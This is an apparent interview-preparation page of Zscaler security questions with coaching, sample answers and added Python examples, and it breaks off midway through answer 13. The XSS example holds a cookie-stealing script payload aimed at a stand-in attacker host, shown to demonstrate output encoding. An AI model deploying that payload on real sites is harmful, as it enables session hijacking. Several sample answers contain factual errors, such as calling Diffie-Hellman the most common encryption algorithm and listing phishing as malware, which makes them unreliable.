Zscaler Interview Questions

26 Questions and Answers by Tom Dushaj

Published March 7th, 2019 | Tom Dushaj is a business and technology executive and an accomplished author of the book "Resumes That Work".
26 Zscaler Interview Questions
Interview Questions
  1. There are different levels of data classification, how are they structured, and why are they required?
  2. What is the difference between Asymmetric and Symmetric encryption and which one is better?
  3. Tell me what your favorite security assessment tools are, and why you prefer them over others?
  4. One of the most prevalent types of attempts at intrusions we see when monitoring our clients' networks is a Distributed Denial of Service (DDoS) attack. Can you explain what a DDoS is and what you would recommend to clients to prevent it?
  5. Can you name some open source cloud computing platform databases?
  6. Most of our clients believe they have taken the necessary steps to protect themselves against malware. However, since they tend to focus on a small subset of threats, this isn't usually true. Can you list the types of malware clients should be aware of?
  7. What are the various ways to inform employees about information security policies and procedures?
  8. Can you explain the security requirements we must adhere to in order to confirm that our customers' data is secure in the cloud?
  9. What's the difference between a threat, vulnerability, and a risk, and how do you assess the severity of a threat for example?
  10. Can you tell me what the difference is between stored and reflected XSS, and the common defenses against XSS?
  11. How will you detect an incident or data breach, and what steps do you take to prevent it from happening?
  12. Malicious Software, or Malware, has many meanings and connotations. What is your definition of Malware and how would you explain it to a client?
  13. If you were given the task of having to both encrypt and compress data during transmission, which would you do first, and why?
  14. Many companies are new to the cloud computing environment. How do you brief them about what security aspects come with a cloud?
  15. In a situation where a user needs admin rights on his system, what is the protocol that you follow to grant or restrict admin access?
  16. Even though we have taken measures to protect our clients' data and create a secure cloud environment, some of our clients have had incidents of potential intrusion from unauthorized sources. Tell me how you advise clients to prevent intrusions.
  17. How would you educate our clients to recognize the symptoms of malware so they can notify us of an intrusion so we can begin to take measures to remediate it?
  18. Can you explain what a public and private key is in the world of public-key cryptography, and which key is used for which function?
  19. Our company provides customers with details of our policies, processes, and guidelines for setting up and managing their hosted resources. However, often the clients are confused by this information. How would you help them better understand it?
  20. Give me your opinion on Blockchain technology, and how do you think it will revolutionize cyber security?
  21. During the implementation of a hosted cloud environment, our IT team emphasizes that the most insecure component of a cloud infrastructure is the data transmission process. How do you recommend customers secure data while transferring it to the cloud?
  22. In addition to monitoring our customer's online security, we provide them with periodic reports about threats and attempts to penetrate their network. What objects do you feel should be included in a security penetration report?
  23. Can you describe the difference between a Black Hat, White Hat and Grey Hat hacker?
  24. There have been several virus attacks recently, what have you done to protect your organization from these cyber attacks?
  25. Explain the difference between symmetric and public-key cryptography, and what their importance is to encryption technology?
  26. What is a false positive and false negative alert in the case of Intrusion Detection Systems?
Answer Examples
1.
There are different levels of data classification, how are they structured, and why are they required?
With data security under heightened scrutiny throughout the world, protecting customer data has never been more important. Data has become a valuable commodity, and companies go to great lengths to protect it. When asked by the hiring manager, don't be afraid to offer examples of how you set data classification policies or reclassified data to a more restrictive level with access limited to administrators, for example. Also highlight your knowledge of the different levels of data classification (i.e. Restricted, Private and Public) and the controls each level requires.

Tom's Answer #1
"Setting data classification policy is very important, because if you don't have a policy in place, you won't know what your level of sensitivity is, which means you have no baseline or security controls to protect your data. This is an important topic to me, and I take it very seriously. My involvement goes deeper into data classification than any other team member, so I typically take the lead for data classification in three main levels: Restricted Data, Private Data, and Public Data. Here's how I classify these three into workable tasks.

1. Restricted Data - I apply the highest level of security to a restricted classification, because it has the highest level of risk.
2. Private Data - This one is a moderate risk level, but should still be treated as private data and protected nonetheless.
3. Public Data - Normally this level is low or no risk. While there are still controls in place, some level of control is still required."
Tom's Answer #2
"There are a number of different ways that classification of data can be performed. I've always had an interest in data collection and classification, which has led me into a Cyber Security occupation. Interestingly enough, many organizations collect and classify data in different ways. As a Data Steward, it is my obligation to reclassify data - this is conducted periodically - determine what frequency is most appropriate based on available - if after doing a data reclassification, it is determined that the data has changed or was modified, then I look at whether existing controls are consistent with the new data classification. If gaps are found within existing controls, they are immediately corrected."
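The three-level scheme described above only becomes enforceable once something decides which level a record belongs to and which controls that level demands. The following is an added example (not from this page or from Zscaler) of a content-based classifier: it scans constructed sample records for indicators such as card numbers (validated with a Luhn check so random digit runs are not over-classified), social security numbers and email addresses, assigns Restricted, Private or Public, and maps the label to a control baseline. The indicator patterns, the control sets and the sample records are assumptions chosen for illustration.

```python
import re

# Three-level scheme used on this page, ordered from least to most sensitive.
LEVELS = ("Public", "Private", "Restricted")

# Illustrative control baseline per level (an assumption for this example, not a standard).
REQUIRED_CONTROLS = {
    "Public": {"integrity-check"},
    "Private": {"integrity-check", "authenticated-access", "tls-in-transit"},
    "Restricted": {"integrity-check", "authenticated-access", "tls-in-transit",
                   "encryption-at-rest", "admin-only-access", "audit-logging"},
}

# Candidate card number: 13-19 digits, optionally separated by spaces or dashes.
PAN_RE = re.compile(r"\b(?:\d[ -]?){12,18}\d\b")
SSN_RE = re.compile(r"\b\d{3}-\d{2}-\d{4}\b")
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")


def luhn_ok(candidate: str) -> bool:
    """Luhn check digit test: rejects digit runs that merely look like card numbers."""
    digits = [int(c) for c in candidate if c.isdigit()]
    if not 13 <= len(digits) <= 19:
        return False
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def classify(text: str) -> str:
    """Return the most sensitive level whose indicators appear in the text."""
    if SSN_RE.search(text) or any(luhn_ok(m.group(0)) for m in PAN_RE.finditer(text)):
        return "Restricted"
    if EMAIL_RE.search(text):
        return "Private"
    return "Public"


def highest(levels):
    """Aggregate several findings into one label, e.g. for a whole file or dataset."""
    return max(levels, key=LEVELS.index, default="Public")


def classify_records(records):
    """records: iterable of (name, text). Returns {name: (level, sorted required controls)}."""
    out = {}
    for name, text in records:
        level = classify(text)
        out[name] = (level, sorted(REQUIRED_CONTROLS[level]))
    return out


# Constructed sample records for this example (not real data).
SAMPLE_RECORDS = [
    ("press-release.txt", "Acme announces a new office in Denver."),
    ("crm-export.csv", "jane.doe@example.com,Denver,Gold tier"),
    ("payments.log", "card=4111 1111 1111 1111 amount=19.99 status=ok"),
    ("support-ticket.txt", "Customer SSN 123-45-6789 requested account closure"),
    ("order-ref.txt", "ref 4111111111111112 shipped"),   # 16 digits, but fails Luhn
]

if __name__ == "__main__":
    for name, (level, controls) in classify_records(SAMPLE_RECORDS).items():
        print(f"{name:22} {level:10} {', '.join(controls)}")
```

In practice such a scan is one input to the data steward's periodic reclassification, not the whole process: it catches obvious indicators, while context (who owns the data, what it is used for) still has to be decided by policy.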
2.
What is the difference between Asymmetric and Symmetric encryption and which one is better?
When comparing asymmetric and symmetric encryption, there are several things you need to be aware of. Not only will you need to know the difference between the two (symmetric uses one shared key for both encryption and decryption; asymmetric uses a public/private key pair), but how each is used and which one fits a particular situation. Neither is simply "better": symmetric ciphers are fast and are used for bulk data, while asymmetric algorithms are slower and are used to exchange or agree the symmetric key and for digital signatures, which is why real protocols such as TLS combine the two. It's important that you can articulate to the hiring manager examples of how you used both in specific situations and what you did to put a sound solution in place. Cyber security has become one of the most important topics in technology today. Anytime you're processing credit card transactions through a payment gateway online, or at a brick and mortar retail store, you're dealing with vital consumer information, and hiring managers are going to want to hear how you keep it protected.

Tom's Answer #1
"When I work with Asymmetric encryption, I always take into account that there has to be a private key and a public key for anyone sending a message. I have to adhere to a decryption policy for where and how the public and private keys are stored and shared. The way I view the differences between the two is that the execution of asymmetric encryption algorithms is slower than symmetric encryption algorithms. Asymmetric encryption is mostly used for exchanging keys in a secure manner, i.e. for establishing a secure channel over a non-secure medium such as the internet. The most common form of an encryption algorithm is Diffie-Hellman."
Tom's Answer #2
"In my current role I do work with Symmetric encryption. Since Symmetric encryption uses a single key for encryption and decryption, I am responsible for monitoring the data transmission of those communication messages to prevent a potential intrusion or breach alert. As with many symmetric encryption algorithms, they execute faster and are less complex than Asymmetric encryption, and are a preferred method of encrypting communication. The most commonly used symmetric encryption algorithms are 3DES, AES, DES, and RC4."
3.
Tell me what your favorite security assessment tools are, and why you prefer them over others?
There are several good software security assessment tools on the market that can get the job done very efficiently. Here are just a few that are among the more popular: Metasploit, Wireshark, Nikto, Retina CS, and Aircrack.

The goal of the hiring manager is to get you to talk about your favorites so they can accurately assess your knowledge and competency with these tools. When you talk about your favorites, start from the one you like most, and try to limit it to no more than three. Ideally, you should have used all three extensively and can talk at a detailed level about what these tools can do better than others in the market. If you enjoyed working with these tools, and are passionate, let the manager know how excited you are about these tools, and why they are your favorites.

Tom's Answer #1
"Since there are so many good software security assessment tools in the market, it's hard to pick from the bunch. I do however have some favorites that I will talk about and why I like them so much. Let's start with Metasploit; in my eyes, it's considered one of the best tools for penetration testing. It helps identify vulnerabilities, it manages security assessments and improves security awareness. The next one is Wireshark; this is one I've been using for a while, and one of the reasons I like it so much is that it also serves as a network analyzer and troubleshooter. It's flexible and operates across multiple platforms like macOS, Windows, Linux, etc. Lastly, we have Nikto; this one I use quite a bit to scan websites for potential vulnerabilities. It has a really nice feature that allows you to find loopholes like cross-site scripting, improper cookie handling, etc."
Tom's Answer #2
"Even though I have used several software security assessment tools, I'm certainly not discounting others that are not on my favorites list. Here are a couple I have used and I have a high comfort level with. Retina CS is an open source product that handles vulnerability management very well. Aircrack is another worth mentioning. It can be used to recover lost keys by capturing data packets, and it also supports multiple platforms like Windows, Linux, Solaris, etc. It's important to keep in mind that when selecting a software security assessment tool, you need to first look at whether it's a fit for how a business model is set up. If an IT security department uses a lot of open source software and it's part of how they work, you might tend to navigate towards open source software. The advantage here is that it's free. The downside might be limited support and limited features. Something to ponder."
4.
One of the most prevalent types of attempts at intrusions we see when monitoring our clients' networks is a Distributed Denial of Service (DDoS) attack. Can you explain what a DDoS is and what you would recommend to clients to prevent it?
The interviewer is testing your knowledge of cybersecurity and attempting to ensure that you will be able to interface with clients on both a business and technical level when presenting them with the services their company offers. This type of question is best answered with a direct answer describing the topic and how you would discuss it with a client.

Tom's Answer #1
"DDoS is an attack by someone attempting to compromise your network by flooding it with a large number of requests. Many networks are unable to handle this and respond by denying service to all users, even legitimate ones. It is called a 'Distributed' attack since the flood of requests can come from many different sources. The best way to defend against a DDoS attack is to analyze and filter network traffic using 'scrubbing centers.' These are servers on the network dedicated to analyzing network traffic and removing malicious requests. Our company offers this service as part of your network security package."
Tom's Answer #2
"A Distributed Denial of Service or DDoS attack is when a threat emanates from multiple sources and attempts to overwhelm a network by creating more requests than the servers can respond to. The response is for the servers to deny all requests, both real and malicious, thereby shutting down the network. The purpose of this type of intrusion is not to hijack data, but rather to take the company offline for a period of time, which can be just as costly. The best way to defend against this type of attack is to set up scrubbing centers, which are servers that are dedicated to analyzing network traffic and blocking malicious requests while allowing legitimate traffic to cross the network. Reputable service providers like ours offer this service as part of their security package."
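What a scrubbing center does at its simplest is rate-limit each source so that a flood is dropped while well-behaved clients keep getting through. The following is an added example (not this page's or Zscaler's code) of a per-source token bucket run over a constructed request stream: one client sending one request per second and three sources sending 200 requests in a single second. The rate and burst values, the IP addresses and the traffic mix are assumptions chosen for illustration.

```python
from collections import defaultdict


class TokenBucket:
    """Per-source rate limiter: refills `rate` tokens per second, holds at most `burst`."""

    def __init__(self, rate: float, burst: int):
        self.rate = rate
        self.burst = burst
        self.tokens = float(burst)
        self.last = None

    def allow(self, now: float) -> bool:
        if self.last is None:
            self.last = now
        # Refill proportionally to elapsed time, capped at the burst size.
        self.tokens = min(self.burst, self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1.0:
            self.tokens -= 1.0
            return True
        return False


def scrub(requests, rate=5.0, burst=10):
    """requests: iterable of (timestamp_seconds, source_ip). Returns (passed, dropped)."""
    buckets = defaultdict(lambda: TokenBucket(rate, burst))
    passed, dropped = [], []
    for ts, src in sorted(requests):          # process in time order
        (passed if buckets[src].allow(ts) else dropped).append((ts, src))
    return passed, dropped


def per_source_counts(events):
    counts = defaultdict(int)
    for _, src in events:
        counts[src] += 1
    return dict(counts)


def constructed_traffic():
    """Constructed sample (not a real capture): one normal client, three flood sources."""
    normal = [(float(s), "203.0.113.10") for s in range(30)]                 # 1 req/s for 30 s
    flood = [(i / 200.0, f"198.51.100.{n}") for n in (1, 2, 3) for i in range(200)]  # 200 req/s
    return normal + flood


if __name__ == "__main__":
    passed, dropped = scrub(constructed_traffic())
    print("passed per source:", per_source_counts(passed))
    print("dropped per source:", per_source_counts(dropped))
```

A production scrubbing service layers more signals on top of this (SYN cookies, source reputation, protocol conformance, anycast to spread the load), but per-source rate limiting is the piece clients can usually reason about, and it makes the difference between "our servers denied everyone" and "only the attackers were denied".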
5.
Can you name some open source cloud computing platform databases?
By asking this question, the interviewer is testing your knowledge of open source cloud databases and trying to learn whether you are familiar with them and can offer options to your customers. The best way to answer is to name the databases you have knowledge of and recommend which one best fits your customer's requirements.

Tom's Answer #1
"There are three main open source cloud computing databases. They are Couch, Lucid and Mongo. These differ from proprietary databases based on there being no licenses required to use them and the ability of the IT community to make revisions in them to improve their performance. Of these, I believe (insert the name of the one you recommend here) is best suited for most client's needs. Not only does it have the features they require, but they won't have to pay any licensing fees, and they can upgrade it at any time."
Tom's Answer #2
"The three main open source cloud databases are Couch DB, Lucid DB, and Mongo DB. For most situations I recommend (insert the one you recommend here.) In addition to having experience with this open-sourced cloud database, I have also worked with Oracle and SQL. This has given me a good perspective on the differences between these such as licensing requirements, scalability, reliability and stability of the platform. I'm comfortable recommending this one to my clients, but if you'd like, I can also discuss either open source or proprietary cloud databases with them."
6.
Most of our clients believe they have taken the necessary steps to protect themselves against malware. However since they tend to focus on a small subset of threats, this isn't usually true. Can you list the types of malware clients should be aware of?
This question tests your knowledge of malware and its types. Answer succinctly by listing the main families (viruses, worms, trojans, spyware, adware, ransomware, bots/zombies), and be precise with terms: phishing and spam are delivery vectors rather than malware, and an interviewer may probe that distinction. You can expect follow-up questions which will probe more into your knowledge of specific types of malware and what measures you recommend your clients take to protect themselves against them.

Tom's Answer #1
"There are nine major types of malware which most people are aware of. These are Viruses, Trojan Horses, Worms, Spyware, Zombie, Phishing, Spam, Adware, and Ransomware. All of these can cause damage to clients by either shutting down their systems, allowing hackers to take over the function of the computers, gain access to the data on the systems or cause the users to be subject to messages and advertising they didn't request. Each of these types of malware requires a specific type of defense strategy, but many of the strategies have common elements which can be repurposed for multiple types of malware."
Tom's Answer #2
"Most people will agree that there are nine major types of malware. These are Viruses, Trojan Horses, Worms, Spyware, Zombie, Phishing, Spam, Adware, and Ransomware. Preventing each type of malware requires a specific type of defense. These can include but are not limited to firewalls, network monitoring, user authentication, and user education. The last strategy, user education, is the most effective way to limit the impact of malware. Teaching users not to open emails from unknown sources, to update their passwords frequently, not to open files they didn't request or weren't expecting, and to scan their systems regularly for viruses will prevent the majority of malware attacks."
7.
What are the various ways to inform employees about information security policies and procedures?
Anyone in IT leadership that is responsible for establishing and maintaining company policy and procedures for security needs to ensure that there's a system in place for monitoring corporate computers and mobile devices to protect against email viruses, malware, and data breaches. You'll find that hiring managers tend to spend a bit more time on this question because they want to gauge your level of confidence on how you implement these practices across the company and the way you communicate the procedures to all employees. The experience you share with the manager will be a reflection of your capabilities and will show that you can think outside the box. It's not uncommon for a manager to ask you to talk at length about communicating effective ways to identify phishing emails, transferring confidential files securely, password management tips, and applying privacy and security updates for all employees. This helps the manager see the level of detail that you go through to protect your company's employees.

Tom's Answer #1
"If you look at statistics on how attacks were established, you will find that over 50% of attacks came from employees within a company who inadvertently allowed access to a hacker, or simply disregarded company security policy. At my last company, I was directly involved in writing the security policies and procedures, as well as setting guidelines and conducting training sessions with employees to teach them to detect phishing emails and similar scams. I demonstrated in detail what a phishing email looks like, what to look for when they receive one, and the procedure to follow once this type of scam is identified. I created an email account so that anyone who received these phishing emails could send them straight to that account."
Tom's Answer #2
"During my security training sessions with employees, I explained the importance of cyber security, and pointed out the risks of an attack and the negative impact it could have on our organization if personal employee or company information is compromised. As part of the training sessions, I discussed in detail the use of and management of strong passwords, and how to use unique characters when selecting new passwords. As a way of making sure all employees were adhering to our security policies, I set quarterly reminders for everyone to change their passwords. I also had everyone apply updates to their systems and privacy settings."
8.
Can you explain the security requirements we must adhere to in order to confirm that our customers' data is secure in the cloud?
It is likely that the interviewer already knows the applicable regulations or has been briefed on them well enough to ask the question. Be prepared to address this question directly with the specific requirements, name the regime that applies to the customer's data (for example PCI DSS for card data, HIPAA for health records, GDPR for EU personal data), and say which controls are the provider's responsibility and which remain the customer's under the shared responsibility model.

Tom's Answer #1
"There are a total of four security requirements that are generally implemented in order to be compliant with user privacy laws. These are:
- Validation of input: the input data must be controlled and transmitted securely
- Backup and security: the data is stored and secured and not open to access from unauthorized parties
- Output reconciliation: audits must be performed to confirm that the data output is the same as the data input
- Processing: data used by an application is controlled throughout the process and not exposed to unauthorized users."
Tom's Answer #2
"Data security is a key component of cloud security. Companies must comply with international data security regulations or they may be subject to fines or injunctions, which could ultimately cause the company to cease operations for a period of time or even permanently. Remaining in compliance with these laws is not difficult if you understand the four basic requirements common to all the laws. These are;
- Validation of input: the input data must be controlled and transmitted securely
- Backup and security: the data is stored and secured and not open to access from unauthorized parties
- Output reconciliation: audits must be performed to confirm that the data output is the same as the data input
- Processing: data used by an application is controlled throughout the process and not exposed to unauthorized users"
9.
What's the difference between a threat, vulnerability, and a risk, and how do you assess the severity of a threat for example?
If you're a Certified Information Systems Security Professional (CISSP), then you should know the difference between a threat, a vulnerability, and a risk: a threat is something that can cause harm (an attacker, malware, a careless insider), a vulnerability is a weakness a threat can exploit (an unpatched service, a missing access control), and risk is the combination of the likelihood that a threat exploits a vulnerability and the impact if it does. Severity is assessed from those two factors; for a technical vulnerability a CVSS base score is the usual starting point, adjusted for how exposed and how critical the affected asset is. When you're starting a new job, you don't know the new environment, so you need to gather some basic information about where everything is, and how things were operating before you came along.

One of the first things you'll need to do is assess the landscape. You'll probably need to locate where the data resides, who is or was managing the data, and what the network diagram looks like. The hiring manager wants to see if you are experienced enough to ask these questions so that they know they're not dealing with a junior level candidate with limited experience in these areas.

After you have outlined what you would do when you start, they will dig a little deeper and ask you to explain the differences between threat, vulnerability and risk, and how you assess threats. As a general rule, you should talk about the differentiators among the three first, and then the process you follow to assess a threat. The interviewer's attention will be focused on how you assess a threat.

Here are a few items you may want to research further regarding assessments. Visibility touch points, Ingress and Egress filtering, and Vulnerability Assessments.

Tom's Answer #1
"My answer is that vulnerabilities should usually be the main focus of an organization since there is little control over the volume and consistency of threats that come in daily. In past roles when I started with a new company, the first thing that was on my task list was to perform a vulnerability assessment. This revealed a lot about the current state of risks and vulnerabilities to the network, and what needed to be done to close those gaps and secure all entry ports into the network. After doing a full assessment, I recorded visibility touch points to monitor where threats came from, and the strength and weakness of our vulnerabilities which helped me map out a long-term IT Security strategy plan."
Tom's Answer #2
"I've always been a strong believer that the best defense is a good offense. Companies are always under network security attacks, and if you leave yourself vulnerable, it's almost like playing whack-a-mole. You're constantly on the defensive when you should be pro-actively offensive. One of the methods I implemented in my last company was a Defense Threat Modeling method. This method takes monitoring to a new level by pro-actively seeking out methods that hackers use to infiltrate systems while being undetected. At the same time, I keep up to date with online periodicals from IT Security sources to learn about new threats and the risks they represent. Another way that I combat threats is by using Ingress and Egress Filtering. The Ingress method is used to prevent suspicious traffic from entering a network, and the Egress method is used to monitor or restrict data by means of a firewall that blocks packets that fail to meet the established security requirements."
10.
Can you tell me what the difference is between stored and reflected XSS, and the common defenses against XSS?
To answer this well, be precise about what XSS is. Cross-Site Scripting (XSS) is a web application vulnerability, not a virus: the application places untrusted input into a page without encoding it, so an attacker's script runs in the victim's browser with the victim's session. In stored (persistent) XSS the payload is saved on the server, for example in a comment or profile field, and is delivered to every user who views that page. In reflected XSS the payload travels in the request itself, typically a crafted link, and is echoed straight back in the response; the attacker has to get a victim to click it, so phishing is the usual delivery route. Common defenses are context-aware output encoding (HTML, attribute, JavaScript and URL contexts each need their own encoding), input validation, a Content Security Policy that restricts where scripts may load from, and marking session cookies HttpOnly so a successful injection cannot read them.

The interviewer asks this to see whether you understand XSS well enough to defend a web application, and how you have worked with developers and users on it. Your answer should cover the stored versus reflected distinction, the defenses above, and what you have done to combat these attacks in the past. Mentioning a training program that taught employees to spot malicious emails and fake links helps for the reflected case, but lead with the application-side controls, since user awareness does nothing against a stored payload. Before-and-after numbers from a remediation effort show that you are proactive as well.

Tom's Answer #1
"When I address Cross-Site Scripting (XSS), or more specifically Stored XSS attacks, my first thought is how can I prevent future attacks from happening. Since Stored XSS attacks happen without the victim knowing they've been compromised, it's important for me to look at ways that we can inform our personnel about the various methods that attackers use to make you think that an email or browser plug-in, for example, is safe. I set up periodic informational training sessions to educate our personnel on how to spot these malicious attacks, and what to do if they come across any suspicious messages or errors. Another important part of my role is input validation and output sanitization."
Tom's Answer #2
"Reflected XSS attacks can occur at any time, so it's important for me to educate our employees, so they don't become a victim of these unsuspecting attacks. I always take a pro-active approach to these things, and have designed a series of educational classes to educate all employees on new attacks that have been discovered, and how to respond in case they may be targeted as an unsuspecting victim. One of the many things I cover in our training sessions is to show examples of what these emails and errors look like, and how to report them as soon as you notice them. In my role, I also have to make sure that I sanitize requests from the server side scripts to further reduce or eliminate vulnerabilities."
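The stored versus reflected distinction, and the "sanitize on output" defense both answers mention, are easiest to see in code. Below is an added example (not from this page or from Zscaler) of a tiny comment feature (stored) and a search echo (reflected), each in a vulnerable form and a hardened form that encodes for the HTML context at output time, plus a link builder showing why encoding alone is not enough in a URL context. The payload, the page fragments and the helper names are constructed for this illustration.

```python
import html
import re
from urllib.parse import urlsplit

# Constructed attacker payload for this example (not from a real incident).
PAYLOAD = '<script>new Image().src="https://attacker.invalid/?c="+document.cookie</script>'

SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def contains_live_script(page: str) -> bool:
    """Crude check used by the demo: is there an un-encoded <script tag in the output?"""
    return SCRIPT_TAG.search(page) is not None


# --- Stored XSS: untrusted data is persisted and later rendered to every visitor ---
comment_store = []


def post_comment(text: str) -> None:
    comment_store.append(text)      # stored verbatim; encoding belongs at render time


def render_comments_vulnerable() -> str:
    # Raw concatenation into HTML: whoever views the page runs the attacker's script.
    return "<ul>" + "".join(f"<li>{c}</li>" for c in comment_store) + "</ul>"


def render_comments_hardened() -> str:
    # Encode for the HTML element context at the point of output.
    return "<ul>" + "".join(f"<li>{html.escape(c, quote=True)}</li>" for c in comment_store) + "</ul>"


# --- Reflected XSS: a request parameter is echoed straight back in the same response ---
def search_page_vulnerable(query: str) -> str:
    return f"<p>Results for: {query}</p>"


def search_page_hardened(query: str) -> str:
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


# --- Context matters: HTML encoding does not make a URL safe inside href ---
def safe_href(url: str) -> str:
    """Allowlist the scheme before encoding; 'javascript:' survives html.escape untouched."""
    if urlsplit(url.strip()).scheme.lower() not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)


def profile_link_hardened(url: str) -> str:
    return f'<a href="{safe_href(url)}">homepage</a>'


if __name__ == "__main__":
    post_comment(PAYLOAD)
    print("stored, vulnerable :", render_comments_vulnerable())
    print("stored, hardened   :", render_comments_hardened())
    print("reflected, hardened:", search_page_hardened(PAYLOAD))
    print("link, hardened     :", profile_link_hardened("javascript:alert(document.cookie)"))
```

Output encoding is the control that removes the vulnerability; a Content Security Policy and HttpOnly session cookies are defense in depth that limit what an injection can do if an encoding is missed somewhere.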
11.
How will you detect an incident or data breach, and what steps do you take to prevent it from happening?
There are many software and hardware detection systems on the market that help find incidents and data breaches, but no control prevents every intrusion, so avoid claiming a 0% intrusion rate. Hiring managers will ask situational questions about detection: how an intrusion starts, what telemetry you collect, and how quickly you can spot an attacker who is already inside. Explaining that organizations need to change their mindset from blocking known signatures to detecting attacker behavior will earn you points in the interview. Be ready to articulate the procedure for tracking an intruder, where most companies' detection fails, and how you measure improvement (for example, time to detect and time to contain). Don't be shy; tell the manager how much you enjoy your work, and how proud you are of the environment you set up and maintain as a direct result of your security strategy and vision.

Tom's Answer #1
"An incident can happen at any time without warning, so being ready is critically important. I strongly believe that every company should have a plan B for attacks that take place without warning. Once a hacker gains access to a system, there are two main directives that they pursue. Doing reconnaissance, and exploring to understand the system. Their next steps are to find assets (Data), how to access them, all while acting in a stealth mode in the system. This is where I would be able to detect their movements, and track activity."
Tom's Answer #2
"The trick is having a strong detection system that finds an attacker early in the process to thwart or minimize data theft or other significant damage. In order to find an active attacker, there are two challenges that must be addressed and solved:

1) You need to change your approach on what you look for and how you identify them
2) Look at full network activity, rather than limited packet routing

I find that the whole mindset has to change, because identifying an active attacker through the typical process of pre-defined signatures, entry behaviors, and other signs isn't the most efficient way of protecting your systems. These hackers are meticulous, and follow a step-by-step campaign to gain entry."
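The two answers above describe an attacker who, once inside, explores and reaches for assets, and argue that signature matching alone will not catch that. Here is an added example (not from this page or from Zscaler) of a detector over constructed authentication log lines that contrasts the two approaches: a signature check against a blocklisted source IP, and a behavioral check that builds a baseline of which hosts each user normally logs into and alerts when a user reaches several hosts never seen before (the "find assets" phase). The log format, host names, IP addresses, blocklist entry and the threshold of three hosts are assumptions made for this illustration.

```python
import re
from collections import defaultdict

# Constructed log format for this example: one authentication event per line.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) user=(?P<user>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) result=(?P<result>SUCCESS|FAIL)$"
)


def parse(lines):
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:                      # malformed lines are skipped here; count them in production
            yield m.groupdict()


def build_baseline(history_lines):
    """Which hosts each user normally reaches (successful logins only)."""
    baseline = defaultdict(set)
    for ev in parse(history_lines):
        if ev["result"] == "SUCCESS":
            baseline[ev["user"]].add(ev["dst"])
    return baseline


def detect(baseline, new_lines, blocklisted_ips, fanout_threshold=3):
    """Signature check (blocklist) plus a behavioral check (fan-out to never-seen hosts)."""
    alerts = []
    new_hosts = defaultdict(set)
    for ev in parse(new_lines):
        if ev["src"] in blocklisted_ips:
            alerts.append(("signature", ev["user"], ev["src"], "source IP is on the blocklist"))
        if ev["result"] != "SUCCESS":
            continue                # failed attempts are not reach; handle them in a separate rule
        if ev["dst"] not in baseline.get(ev["user"], set()):
            new_hosts[ev["user"]].add(ev["dst"])
            if len(new_hosts[ev["user"]]) == fanout_threshold:   # alert once per user
                alerts.append(("behavior", ev["user"], ev["src"],
                               f"reached {fanout_threshold} hosts never seen in baseline"))
    return alerts


# Constructed "last 30 days" history and "today" events (not real logs).
HISTORY = [
    "2019-02-10T09:01:00Z user=alice src=10.0.0.5 dst=fileserver01 result=SUCCESS",
    "2019-02-10T09:02:00Z user=alice src=10.0.0.5 dst=mail01 result=SUCCESS",
    "2019-02-11T09:00:00Z user=alice src=10.0.0.5 dst=fileserver01 result=SUCCESS",
    "2019-02-11T10:00:00Z user=bob src=10.0.0.9 dst=hr-db result=SUCCESS",
    "2019-02-12T10:00:00Z user=bob src=10.0.0.9 dst=finance-db result=FAIL",
]
TODAY = [
    "2019-03-07T08:55:00Z user=alice src=10.0.0.5 dst=fileserver01 result=SUCCESS",
    "2019-03-07T02:14:00Z user=alice src=10.0.0.77 dst=finance-db result=SUCCESS",
    "2019-03-07T02:15:00Z user=alice src=10.0.0.77 dst=build-srv result=SUCCESS",
    "2019-03-07T02:15:30Z user=alice src=10.0.0.77 dst=backup01 result=FAIL",
    "2019-03-07T02:16:00Z user=alice src=10.0.0.77 dst=backup01 result=SUCCESS",
    "2019-03-07T11:00:00Z user=bob src=10.0.0.9 dst=hr-db result=SUCCESS",
    "2019-03-07T11:30:00Z user=svc-backup src=198.51.100.23 dst=backup01 result=SUCCESS",
    "garbage line that does not parse",
]
BLOCKLIST = {"198.51.100.23"}      # constructed indicator, not a real IOC

if __name__ == "__main__":
    for alert in detect(build_baseline(HISTORY), TODAY, BLOCKLIST):
        print(alert)
```

The signature rule only fires on an indicator you already have; the behavioral rule fires on the attacker's movement through the environment regardless of which address or tool they use, which is the mindset change the answer argues for. Threshold and baseline window are tuning decisions that trade false positives against time to detect.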
12.
Malicious Software, or Malware, has many meanings and connotations. What is your definition of Malware and how would you explain it to a client?
This is a 'set the table' question which the interviewer is using to qualify you as a valid candidate and also to determine if you and the interviewer agree on the terminology used in their business. Your answer should be a straightforward definition of the term and some additional explanation of how people in your industry use it.

Tom's Answer #1
"Malware is any type of software which is disruptive to normal computer operations. Not only can it damage your systems, but it can cause a security risk by gaining access to your systems and gathering private information. Malware comes in several different forms including code, scripts, content which is malicious or other types of software. Malware is often unintentionally downloaded by authorized users on the network when they visit a website or click on a link."
Tom's Answer #2
"Malware is any malicious or intrusive software which is intended to disrupt a computer's operations by gaining control of the device or obtaining access to other software or private data. Malware comes in several different forms including a software program, malicious code, scripts which execute hidden commands or software which monitors the activity on a system. Malware can gain access to a system through unintentional actions by users who believe they are accessing legitimate websites or programs, or by bots and other automated programs which scan networks looking for areas of vulnerability."
13.
If you were given the task of having to both encrypt and compress data during transmission, which would you do first, and why?
This is a typical situational and task-oriented interview question that asks you to explain how you perform a task, the step-by-step process you follow, and what your reasoning is behind the process that you followed. Please note that the interviewer will be observing how you respond to this question. They will be looking at whether or not you appear to be confident in your response, or get nervous and panic while answering this question. Always keep calm, and take a deep breath before answering each question. Even if you have to wait a few seconds to respond, that's fine. It also shows the interviewer that you think through the questions before answering.

In short, both data compression and data encryption are methods that transform data into a different format. When you're talking about the tasks and what you do in the process, let the interviewer know that even though compression and encryption both transform data, it's the order of execution and the small details that matter and must not be overlooked.

Tom's Answer #1
"Yes, there is a process that I follow that ensures safe transmission of data. When I design a data compression scheme, there are some important factors such as the level of compression required, the amount of distortion introduced by the compression, and the computational hardware/appliance resources required to compress and decompress the data.
